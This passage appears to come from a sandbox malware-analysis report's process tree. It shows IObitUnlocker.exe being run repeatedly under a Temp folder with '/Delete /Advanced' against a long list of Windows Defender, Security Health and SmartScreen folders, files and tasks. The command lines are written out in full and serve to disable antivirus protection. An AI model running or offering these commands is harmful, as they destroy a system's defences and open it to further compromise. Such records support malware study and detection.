Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:7488
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7652
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:7584
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7524
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7540
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:7128
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:7612
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7820
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:5196
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat 